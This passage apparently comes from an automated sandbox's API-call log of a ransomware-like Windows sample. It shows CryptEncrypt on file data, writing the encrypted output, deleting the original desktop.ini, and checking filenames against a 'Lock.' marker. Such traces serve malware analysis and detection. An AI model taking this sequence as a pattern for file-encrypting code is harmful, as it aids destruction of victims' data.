| out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75300 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0215.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.708] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x192, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x198) returned 1 [0215.708] CharLowerBuffW (in: lpsz="byte[408]", cchLength=0x9 | out: lpsz="byte[408]") returned 0x9 [0215.708] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.708] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.708] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a75300*, pdwDataLen=0x8cef60*=0x192, dwBufLen=0x198 | out: pbData=0x2a75300*, pdwDataLen=0x8cef60*=0x198) returned 1 [0215.708] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.708] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.708] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.708] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.708] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.708] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.710] WriteFile (in: hFile=0x510, lpBuffer=0x2a75e50*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a75e50*, lpNumberOfBytesWritten=0x8cf5e4*=0x198, lpOverlapped=0x0) returned 1 [0215.711] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.711] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.711] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.711] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab7d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.712] CryptDestroyKey (hKey=0x9e1ab8) returned 1 [0215.712] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.712] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.712] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.713] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0215.713] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.713] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.713] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.713] CloseHandle (hObject=0x504) returned 1 [0215.716] CloseHandle (hObject=0x510) returned 1 [0215.718] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.718] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.718] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x25 [0215.718] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 0x26 [0215.718] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1bf8 [0215.718] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 1 [0215.720] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0215.720] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0215.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544e8 | out: hHeap=0x2af0000) returned 1 [0215.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.720] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.721] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0215.721] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb3c8 [0215.723] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x25 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0215.723] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 0xffffffff [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38541a0 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.723] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0215.723] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.723] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0215.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faIAqUgP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aIAqUgP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IAqUgP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AqUgP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qUgP BwWKbX.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UgP BwWKbX.docx", cchCount1=5, 